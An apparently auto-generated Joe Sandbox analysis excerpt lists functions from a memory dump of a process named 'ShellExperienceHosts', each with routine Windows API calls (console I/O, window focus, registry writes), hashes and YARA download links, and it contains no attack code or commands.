Associated: 00000003.00000002.3536008544.000000006C9A0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.3536144163.000000006CB30000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.3536185273.000000006CB86000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.3536205328.000000006CB88000.00000008.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.3536226112.000000006CB8D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.3536246088.000000006CB91000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6c9a0000_ShellExperienceHosts.jbxd

Similarity

API ID: Window
String ID:
API String ID: 2353593579-0
Opcode ID: 861d8c44e4c31c3cb0ff4261194fcd25cbb971902a2ce5e7e778964ea5be8ee4
Instruction ID: 8c9bb42e62ee6525c2e63a24926f90388d13d1c729da88176813ca6103195b12
Opcode Fuzzy Hash: 861d8c44e4c31c3cb0ff4261194fcd25cbb971902a2ce5e7e778964ea5be8ee4
Instruction Fuzzy Hash: ED01A23614565AFBDF126F91EC04ADF3B2AFF1A355F008014FA28B5560C73AC661EBA1

Function 6C9BE775 Relevance: 6.0, APIs: 4, Instructions: 41windowCOMMON

Download Yara Rule

APIs

GetParent.USER32(?), ref: 6C9BE783
GetParent.USER32(?), ref: 6C9BE796
GetParent.USER32(?), ref: 6C9BE7B0
SetFocus.USER32(?,00000000,?,?,6C9C1436,?,6C9A21AE,?), ref: 6C9BE7C9

Memory Dump Source

Source File: 00000003.00000002.3536028295.000000006C9A1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C9A0000, based on PE: true

Associated: 00000003.00000002.3536008544.000000006C9A0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.3536144163.000000006CB30000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.3536185273.000000006CB86000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.3536205328.000000006CB88000.00000008.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.3536226112.000000006CB8D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.3536246088.000000006CB91000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6c9a0000_ShellExperienceHosts.jbxd

Similarity

API ID: Parent$Focus
String ID:
API String ID: 384096180-0
Opcode ID: e3721e7d2cfbbd0e3fac8ba989d334869a83ad3f29cf0d242ee10c163570c6d5
Instruction ID: ac9bfda9eaa80b51b0f5d405b94336bfdaba321e14c6d225691d24399992be1b
Opcode Fuzzy Hash: e3721e7d2cfbbd0e3fac8ba989d334869a83ad3f29cf0d242ee10c163570c6d5
Instruction Fuzzy Hash: F8F06D32A50610ABCF216B70998C86F7BBDFFB4A157050569E946A3B20DF70D8009B50

Function 6CB1EC32 Relevance: 6.0, APIs: 4, Instructions: 29COMMONLIBRARYCODE

Download Yara Rule

APIs

WriteConsoleW.KERNEL32(00000000,6CB18F92,00000000,00000000,00000000,?,6CB1940F,00000000,00000001,00000000,?,?,6CB12CBC,?,00000000,00000000), ref: 6CB1EC49
GetLastError.KERNEL32(?,6CB1940F,00000000,00000001,00000000,?,?,6CB12CBC,?,00000000,00000000,?,?,?,6CB13296,?), ref: 6CB1EC55

Part of subcall function 6CB1EC1B: CloseHandle.KERNEL32(FFFFFFFE,6CB1EC65,?,6CB1940F,00000000,00000001,00000000,?,?,6CB12CBC,?,00000000,00000000,?,?), ref: 6CB1EC2B

___initconout.LIBCMT ref: 6CB1EC65

Part of subcall function 6CB1EBDD: CreateFileW.KERNEL32(CONOUT$,40000000,00000003,00000000,00000003,00000000,00000000,6CB1EC0C,6CB193FC,?,?,6CB12CBC,?,00000000,00000000,?), ref: 6CB1EBF0

WriteConsoleW.KERNEL32(00000000,6CB18F92,00000000,00000000,?,6CB1940F,00000000,00000001,00000000,?,?,6CB12CBC,?,00000000,00000000,?), ref: 6CB1EC7A

Memory Dump Source

Source File: 00000003.00000002.3536028295.000000006C9A1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C9A0000, based on PE: true

Associated: 00000003.00000002.3536008544.000000006C9A0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.3536144163.000000006CB30000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.3536185273.000000006CB86000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.3536205328.000000006CB88000.00000008.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.3536226112.000000006CB8D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.3536246088.000000006CB91000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6c9a0000_ShellExperienceHosts.jbxd

Similarity

API ID: ConsoleWrite$CloseCreateErrorFileHandleLast___initconout
String ID:
API String ID: 2744216297-0
Opcode ID: 8392b0182465335d805a012a07aa2da4dfa1bf2873224f5877425a007cdd8bd3
Instruction ID: 25420dfde1960eed6333f7682bf72dd35d2f1fcd762b165a29d81a44f279aff5
Opcode Fuzzy Hash: 8392b0182465335d805a012a07aa2da4dfa1bf2873224f5877425a007cdd8bd3
Instruction Fuzzy Hash: 19F0F836205198BBCF221FD5DD08E8E3E7AFF4A7A4B144520FA1996960C6328A209BD1

Function 6CB0EEF8 Relevance: 6.0, APIs: 4, Instructions: 27COMMON

Download Yara Rule

APIs

PeekConsoleInputA.KERNEL32(74DF0F00,00000002,?,00000000,?,6CAFB46C,00000000,?,?,00000002,74DF0F00), ref: 6CB0EF0D
GetLastError.KERNEL32(?,6CAFB46C,00000000,?,?,00000002,74DF0F00), ref: 6CB0EF19

Part of subcall function 6CB0EFE2: CloseHandle.KERNEL32(FFFFFFFF,6CB0EEBE,?,6CAFB402,?,00000002,74DF0F00), ref: 6CB0EFF2

___initconin.LIBCMT ref: 6CB0EF29

Part of subcall function 6CB0EE2E: CreateFileW.KERNEL32(CONIN$,C0000000,00000003,00000000,00000003,00000000,00000000,6CB0EEE9,6CAFB3F1,00000002,74DF0F00), ref: 6CB0EE41

PeekConsoleInputA.KERNEL32(74DF0F00,00000002,?,?,6CAFB46C,00000000,?,?,00000002,74DF0F00), ref: 6CB0EF3D

Memory Dump Source

Source File: 00000003.00000002.3536028295.000000006C9A1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C9A0000, based on PE: true

Associated: 00000003.00000002.3536008544.000000006C9A0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.3536144163.000000006CB30000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.3536185273.000000006CB86000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.3536205328.000000006CB88000.00000008.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.3536226112.000000006CB8D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.3536246088.000000006CB91000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6c9a0000_ShellExperienceHosts.jbxd

Similarity

API ID: ConsoleInputPeek$CloseCreateErrorFileHandleLast___initconin
String ID:
API String ID: 1545762386-0
Opcode ID: 103093c109cf06e4b37370ba87178ae34aab18211b90cbfc55976e3da5e9e753
Instruction ID: 9348fedcf1070147fc35b2d74fde5c5c4461451fad66cd8fec875f600e8ed71f
Opcode Fuzzy Hash: 103093c109cf06e4b37370ba87178ae34aab18211b90cbfc55976e3da5e9e753
Instruction Fuzzy Hash: 69F030363011D9BB8F521F95DC048CD3F36FF0A3657148054FE5C96220CB3298209BE1

Function 6CB0EF4A Relevance: 6.0, APIs: 4, Instructions: 27COMMON

Download Yara Rule

APIs

ReadConsoleInputW.KERNEL32(?,?,?,00000000,?,6CAFB1D4,?,00000001,?,6CB811E8,00000038,6CAFB150,6CB811C8,0000000C,6C9A341C,00000000), ref: 6CB0EF5F
GetLastError.KERNEL32(?,6CAFB1D4,?,00000001,?,6CB811E8,00000038,6CAFB150,6CB811C8,0000000C,6C9A341C,00000000,000000FF), ref: 6CB0EF6B

Part of subcall function 6CB0EFE2: CloseHandle.KERNEL32(FFFFFFFF,6CB0EEBE,?,6CAFB402,?,00000002,74DF0F00), ref: 6CB0EFF2

___initconin.LIBCMT ref: 6CB0EF7B

Part of subcall function 6CB0EE2E: CreateFileW.KERNEL32(CONIN$,C0000000,00000003,00000000,00000003,00000000,00000000,6CB0EEE9,6CAFB3F1,00000002,74DF0F00), ref: 6CB0EE41

ReadConsoleInputW.KERNEL32(?,?,?,?,6CAFB1D4,?,00000001,?,6CB811E8,00000038,6CAFB150,6CB811C8,0000000C,6C9A341C,00000000,000000FF), ref: 6CB0EF8F

Memory Dump Source

Source File: 00000003.00000002.3536028295.000000006C9A1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C9A0000, based on PE: true

Associated: 00000003.00000002.3536008544.000000006C9A0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.3536144163.000000006CB30000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.3536185273.000000006CB86000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.3536205328.000000006CB88000.00000008.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.3536226112.000000006CB8D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.3536246088.000000006CB91000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6c9a0000_ShellExperienceHosts.jbxd

Similarity

API ID: ConsoleInputRead$CloseCreateErrorFileHandleLast___initconin
String ID:
API String ID: 838051604-0
Opcode ID: 139ee3a1128c3ec8da944db5622b694ce603c051f0bbf43332a3c8c29224b4ef
Instruction ID: 206f41b6d933f968442d9b2cea0b4d5b0f39c7e27691050666642e7115f2d21c
Opcode Fuzzy Hash: 139ee3a1128c3ec8da944db5622b694ce603c051f0bbf43332a3c8c29224b4ef
Instruction Fuzzy Hash: FCF03036340199BF8F221F96DC0488D3F76FF4A365B044410F95C96220CB3298209BE2

Function 6CAEE626 Relevance: 6.0, APIs: 4, Instructions: 25COMMON

Download Yara Rule

APIs

Part of subcall function 6C9BE89F: ShowWindow.USER32(?,?,00000000,?,6C9C24AD,00000000,?,?,?,?,?,?,?,6C9C1FF8,00000000,000000FF), ref: 6C9BE8B0

UpdateWindow.USER32(?), ref: 6CAEE64D
UpdateWindow.USER32(?), ref: 6CAEE660
SetRectEmpty.USER32(?), ref: 6CAEE66D
SetRectEmpty.USER32(?), ref: 6CAEE67A

Memory Dump Source

Source File: 00000003.00000002.3536028295.000000006C9A1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C9A0000, based on PE: true

Associated: 00000003.00000002.3536008544.000000006C9A0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.3536144163.000000006CB30000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.3536185273.000000006CB86000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.3536205328.000000006CB88000.00000008.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.3536226112.000000006CB8D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.3536246088.000000006CB91000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6c9a0000_ShellExperienceHosts.jbxd

Similarity

API ID: Window$EmptyRectUpdate$Show
String ID:
API String ID: 1262231214-0
Opcode ID: 66cda85b0e7dbe900e90ddc907db6a8ff7a4c416d056cce45eedaf091380500b
Instruction ID: 3b8f07a68d0a8d30ca22119533ff6b5166b10ca2a03d59111bb5ae40794309b9
Opcode Fuzzy Hash: 66cda85b0e7dbe900e90ddc907db6a8ff7a4c416d056cce45eedaf091380500b
Instruction Fuzzy Hash: 05F0F871710615DFEBA09B70E808BDA7BF8BF09616F018959E19EC7160DB30A888DF94

Function 6CAF5C7A Relevance: 6.0, APIs: 4, Instructions: 25timethreadCOMMONLIBRARYCODE

Download Yara Rule

APIs

GetSystemTimeAsFileTime.KERNEL32(00000001), ref: 6CAF5C8C
GetCurrentThreadId.KERNEL32 ref: 6CAF5C9B
GetCurrentProcessId.KERNEL32 ref: 6CAF5CA4
QueryPerformanceCounter.KERNEL32(?), ref: 6CAF5CB1

Memory Dump Source

Source File: 00000003.00000002.3536028295.000000006C9A1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C9A0000, based on PE: true

Associated: 00000003.00000002.3536008544.000000006C9A0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.3536144163.000000006CB30000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.3536185273.000000006CB86000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.3536205328.000000006CB88000.00000008.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.3536226112.000000006CB8D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.3536246088.000000006CB91000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6c9a0000_ShellExperienceHosts.jbxd

Similarity

API ID: CurrentTime$CounterFilePerformanceProcessQuerySystemThread
String ID:
API String ID: 2933794660-0
Opcode ID: 0bd51230ac92813a3245b7230cb3dd6a5ef9f6aa3066ad89a8167f1f732318ce
Instruction ID: 044b7ef2b5639fccd5671e66e0a3f80d3e97f1d8b7cc98e8bbcf79c9bf055460
Opcode Fuzzy Hash: 0bd51230ac92813a3245b7230cb3dd6a5ef9f6aa3066ad89a8167f1f732318ce
Instruction Fuzzy Hash: 6BF06275D1020DEFCF14DBB4D68999EBBF8EF1D200B9185A5A412E7100EB30AB44DB51

Function 6CB0EE93 Relevance: 6.0, APIs: 4, Instructions: 23COMMON

Download Yara Rule

APIs

GetNumberOfConsoleInputEvents.KERNEL32(74DF0F00,74DF0F00,?,6CAFB402,?,00000002,74DF0F00), ref: 6CB0EEA2
GetLastError.KERNEL32(?,6CAFB402,?,00000002,74DF0F00), ref: 6CB0EEAE

Part of subcall function 6CB0EFE2: CloseHandle.KERNEL32(FFFFFFFF,6CB0EEBE,?,6CAFB402,?,00000002,74DF0F00), ref: 6CB0EFF2

___initconin.LIBCMT ref: 6CB0EEBE

Part of subcall function 6CB0EE2E: CreateFileW.KERNEL32(CONIN$,C0000000,00000003,00000000,00000003,00000000,00000000,6CB0EEE9,6CAFB3F1,00000002,74DF0F00), ref: 6CB0EE41

GetNumberOfConsoleInputEvents.KERNEL32(74DF0F00,?,6CAFB402,?,00000002,74DF0F00), ref: 6CB0EECC

Memory Dump Source

Source File: 00000003.00000002.3536028295.000000006C9A1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C9A0000, based on PE: true

Associated: 00000003.00000002.3536008544.000000006C9A0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.3536144163.000000006CB30000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.3536185273.000000006CB86000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.3536205328.000000006CB88000.00000008.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.3536226112.000000006CB8D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.3536246088.000000006CB91000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6c9a0000_ShellExperienceHosts.jbxd

Similarity

API ID: ConsoleEventsInputNumber$CloseCreateErrorFileHandleLast___initconin
String ID:
API String ID: 1600138625-0
Opcode ID: a264b8adb084b5e385d763b5370e614ce414aabd77666188c6587d61d3050a0d
Instruction ID: 7320f53089e034a07320659c0b1b7c93acde27453a4dea14d9dec9adffaa9e16
Opcode Fuzzy Hash: a264b8adb084b5e385d763b5370e614ce414aabd77666188c6587d61d3050a0d
Instruction Fuzzy Hash: 9EE04F367450EAAB8F621F96D90888D3E75EF0B3A63040160F94DA3620DB319C1097F3

Function 6CB0EE4D Relevance: 6.0, APIs: 4, Instructions: 23COMMON

Download Yara Rule

APIs

GetConsoleMode.KERNEL32(?,74DF0F00,?,6CAFB1B3,00000000,6CB811E8,00000038,6CAFB150,6CB811C8,0000000C,6C9A341C,00000000,000000FF), ref: 6CB0EE5C
GetLastError.KERNEL32(?,6CAFB1B3,00000000,6CB811E8,00000038,6CAFB150,6CB811C8,0000000C,6C9A341C,00000000,000000FF), ref: 6CB0EE68

Part of subcall function 6CB0EFE2: CloseHandle.KERNEL32(FFFFFFFF,6CB0EEBE,?,6CAFB402,?,00000002,74DF0F00), ref: 6CB0EFF2

___initconin.LIBCMT ref: 6CB0EE78

Part of subcall function 6CB0EE2E: CreateFileW.KERNEL32(CONIN$,C0000000,00000003,00000000,00000003,00000000,00000000,6CB0EEE9,6CAFB3F1,00000002,74DF0F00), ref: 6CB0EE41

GetConsoleMode.KERNEL32(?,?,6CAFB1B3,00000000,6CB811E8,00000038,6CAFB150,6CB811C8,0000000C,6C9A341C,00000000,000000FF), ref: 6CB0EE86

Memory Dump Source

Source File: 00000003.00000002.3536028295.000000006C9A1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C9A0000, based on PE: true

Associated: 00000003.00000002.3536008544.000000006C9A0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.3536144163.000000006CB30000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.3536185273.000000006CB86000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.3536205328.000000006CB88000.00000008.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.3536226112.000000006CB8D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.3536246088.000000006CB91000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6c9a0000_ShellExperienceHosts.jbxd

Similarity

API ID: ConsoleMode$CloseCreateErrorFileHandleLast___initconin
String ID:
API String ID: 3067319862-0
Opcode ID: e945dd41e365e01a5e28f44d54b00aff9ee6dbe06bb9b597308cba4c79bc783d
Instruction ID: 9c1fa8036cfc43462f0e13c939790be981ff9d9f847e2499fb56ee4d2246e22c
Opcode Fuzzy Hash: e945dd41e365e01a5e28f44d54b00aff9ee6dbe06bb9b597308cba4c79bc783d
Instruction Fuzzy Hash: 39E04F367410E9AB8F621FE6DD0988D7E35EF0B3A63144150FD4D93620DB329811D7E2

Function 6CB0EF9C Relevance: 6.0, APIs: 4, Instructions: 23COMMON

Download Yara Rule

APIs

SetConsoleMode.KERNEL32(?,00000000,?,6CAFB1BB,00000000,00000000,6CB811E8,00000038,6CAFB150,6CB811C8,0000000C,6C9A341C,00000000,000000FF), ref: 6CB0EFAB
GetLastError.KERNEL32(?,6CAFB1BB,00000000,00000000,6CB811E8,00000038,6CAFB150,6CB811C8,0000000C,6C9A341C,00000000,000000FF), ref: 6CB0EFB7

Part of subcall function 6CB0EFE2: CloseHandle.KERNEL32(FFFFFFFF,6CB0EEBE,?,6CAFB402,?,00000002,74DF0F00), ref: 6CB0EFF2

___initconin.LIBCMT ref: 6CB0EFC7

Part of subcall function 6CB0EE2E: CreateFileW.KERNEL32(CONIN$,C0000000,00000003,00000000,00000003,00000000,00000000,6CB0EEE9,6CAFB3F1,00000002,74DF0F00), ref: 6CB0EE41

SetConsoleMode.KERNEL32(?,?,6CAFB1BB,00000000,00000000,6CB811E8,00000038,6CAFB150,6CB811C8,0000000C,6C9A341C,00000000,000000FF), ref: 6CB0EFD5

Memory Dump Source

Source File: 00000003.00000002.3536028295.000000006C9A1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C9A0000, based on PE: true

Associated: 00000003.00000002.3536008544.000000006C9A0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.3536144163.000000006CB30000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.3536185273.000000006CB86000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.3536205328.000000006CB88000.00000008.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.3536226112.000000006CB8D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.3536246088.000000006CB91000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6c9a0000_ShellExperienceHosts.jbxd

Similarity

API ID: ConsoleMode$CloseCreateErrorFileHandleLast___initconin
String ID:
API String ID: 3067319862-0
Opcode ID: e50bbb2d507f65ffb8d2dcc71bb118e3ceaa6333b42533084673393d40675363
Instruction ID: b277f42d3e7ed7eb4e8ad271dc42468e1b9691d59bfd79c350e87f967d34d04f
Opcode Fuzzy Hash: e50bbb2d507f65ffb8d2dcc71bb118e3ceaa6333b42533084673393d40675363
Instruction Fuzzy Hash: 77E04F367451E9AB8F621F96D80888D3F36EF0B3B63040260F94DA3620DA22985097E2

Function 6C9DDC8D Relevance: 6.0, APIs: 4, Instructions: 22COMMON

Download Yara Rule

APIs

Part of subcall function 6C9DDCD4: GetStockObject.GDI32(00000000), ref: 6C9DDCFC
Part of subcall function 6C9DDCD4: InflateRect.USER32(?,000000FF,000000FF), ref: 6C9DDDAB

ReleaseCapture.USER32 ref: 6C9DDC98
GetDesktopWindow.USER32 ref: 6C9DDC9E
LockWindowUpdate.USER32(00000000,00000000), ref: 6C9DDCAE
ReleaseDC.USER32(?,?), ref: 6C9DDCC4

Memory Dump Source

Source File: 00000003.00000002.3536028295.000000006C9A1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C9A0000, based on PE: true

Associated: 00000003.00000002.3536008544.000000006C9A0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.3536144163.000000006CB30000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.3536185273.000000006CB86000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.3536205328.000000006CB88000.00000008.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.3536226112.000000006CB8D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.3536246088.000000006CB91000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6c9a0000_ShellExperienceHosts.jbxd

Similarity

API ID: ReleaseWindow$CaptureDesktopInflateLockObjectRectStockUpdate
String ID:
API String ID: 1260764132-0
Opcode ID: 6f11f44614b01d6e80ef558f6a8a6c4f08620e5d444d1683c87ff290829d5f9a
Instruction ID: 633f4e7f503bccd09a3b32ab2a74517a0306b1024fc8f1fa12e19c083422dedf
Opcode Fuzzy Hash: 6f11f44614b01d6e80ef558f6a8a6c4f08620e5d444d1683c87ff290829d5f9a
Instruction Fuzzy Hash: 6BE01232301641ABDF241B71EA0CB5A7E74BF91315F114418E54A96950CBB1D805DB50

Function 6CA6C643 Relevance: 6.0, APIs: 4, Instructions: 21COMMON

Download Yara Rule

APIs

SetRectEmpty.USER32(?), ref: 6CA6C655
SetRectEmpty.USER32(?), ref: 6CA6C65F
SetRectEmpty.USER32(?), ref: 6CA6C669
SetRectEmpty.USER32(?), ref: 6CA6C673

Memory Dump Source

Source File: 00000003.00000002.3536028295.000000006C9A1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C9A0000, based on PE: true

Associated: 00000003.00000002.3536008544.000000006C9A0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.3536144163.000000006CB30000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.3536185273.000000006CB86000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.3536205328.000000006CB88000.00000008.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.3536226112.000000006CB8D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.3536246088.000000006CB91000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6c9a0000_ShellExperienceHosts.jbxd

Similarity

API ID: EmptyRect
String ID:
API String ID: 2270935405-0
Opcode ID: 246d532af71e7410c5c173e46c6e93856b631697b4a782709862502d75cdacc4
Instruction ID: bc95d1115cf887afa96f8fbed128dce10061b40ab975a0f2b999966aad7f52b1
Opcode Fuzzy Hash: 246d532af71e7410c5c173e46c6e93856b631697b4a782709862502d75cdacc4
Instruction Fuzzy Hash: 8FE0C9B151075A9BCB349FA1E449ACAB7FCAF45315B004919E186C3A14E774F1868F54

Function 6CAF6E65 Relevance: 5.5, APIs: 1, Strings: 2, Instructions: 204COMMON

Download Yara Rule

APIs

__aulldiv.LIBCMT ref: 6CAF7007

Strings

0123456789abcdefghijklmnopqrstuvwxyz, xrefs: 6CAF6F32, 6CAF6F37, 6CAF6F53, 6CAF6F88, 6CAF6F8D
-, xrefs: 6CAF7035

Memory Dump Source

Source File: 00000003.00000002.3536028295.000000006C9A1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C9A0000, based on PE: true

Associated: 00000003.00000002.3536008544.000000006C9A0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.3536144163.000000006CB30000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.3536185273.000000006CB86000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.3536205328.000000006CB88000.00000008.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.3536226112.000000006CB8D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.3536246088.000000006CB91000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6c9a0000_ShellExperienceHosts.jbxd

Similarity

API ID: __aulldiv
String ID: -$0123456789abcdefghijklmnopqrstuvwxyz
API String ID: 3732870572-1956417402
Opcode ID: 61760174dbd0b2c0f6a0d78d43a721ecad88a3ff597ec0353685c9f64e79a7f0
Instruction ID: 96d2bcaafd2570abdbe154222529d0013b713c7e32274100fcbfd93ba9226fa6
Opcode Fuzzy Hash: 61760174dbd0b2c0f6a0d78d43a721ecad88a3ff597ec0353685c9f64e79a7f0
Instruction Fuzzy Hash: 2661E171E042599BEF11CEA9C8807AEBBB9AF49314F284459F4B0D7B40D77499C78B50

Function 6C9A2EE0 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 150COMMON

Download Yara Rule

APIs

___std_exception_copy.LIBVCRUNTIME ref: 6C9A305F

Part of subcall function 6CAF821E: RaiseException.KERNEL32(E06D7363,00000001,00000003,6C9A2D73,6CB6672D,?,?,6CAF60E4,6C9A2D73,6CB819B8,?,6C9A2D73,bad locale name), ref: 6CAF827F

Strings

ios_base::badbit set, xrefs: 6C9A2FF7, 6C9A3022, 6C9A3043
ios_base::failbit set, xrefs: 6C9A2F18

Memory Dump Source

Source File: 00000003.00000002.3536028295.000000006C9A1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C9A0000, based on PE: true

Associated: 00000003.00000002.3536008544.000000006C9A0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.3536144163.000000006CB30000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.3536185273.000000006CB86000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.3536205328.000000006CB88000.00000008.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.3536226112.000000006CB8D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.3536246088.000000006CB91000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6c9a0000_ShellExperienceHosts.jbxd

Similarity

API ID: ExceptionRaise___std_exception_copy
String ID: ios_base::badbit set$ios_base::failbit set
API String ID: 3109751735-1240500531
Opcode ID: bd4c370a18cec7b96bbd7a53e7b9fe0bf46b653d1d411c7073cafad0e07d44d9
Instruction ID: 4fca987bae844404eb873c014dd98b8b2b2693fed0e1d467e5de51604017fcbf
Opcode Fuzzy Hash: bd4c370a18cec7b96bbd7a53e7b9fe0bf46b653d1d411c7073cafad0e07d44d9
Instruction Fuzzy Hash: 7341F472900604ABC704CF99DC45BAAF7B8FF59314F14821AF92897B80E734E955CBA1

Function 6C9CE2D7 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 83registryCOMMON

Download Yara Rule

APIs

Part of subcall function 6C9CE0F3: RegCloseKey.ADVAPI32(00000000,?,?,?,6C9CDE02,?,00000000,00000018), ref: 6C9CE138

RegSetValueExW.ADVAPI32(00000000,?,00000000,00000003,?,?,?,00000000), ref: 6C9CE309
RegCloseKey.ADVAPI32(00000000), ref: 6C9CE312

Strings

A, xrefs: 6C9CE34C

Memory Dump Source

Source File: 00000003.00000002.3536028295.000000006C9A1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C9A0000, based on PE: true

Associated: 00000003.00000002.3536008544.000000006C9A0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.3536144163.000000006CB30000.00000002.00000001.01000000.00000006.sdmpDownload File
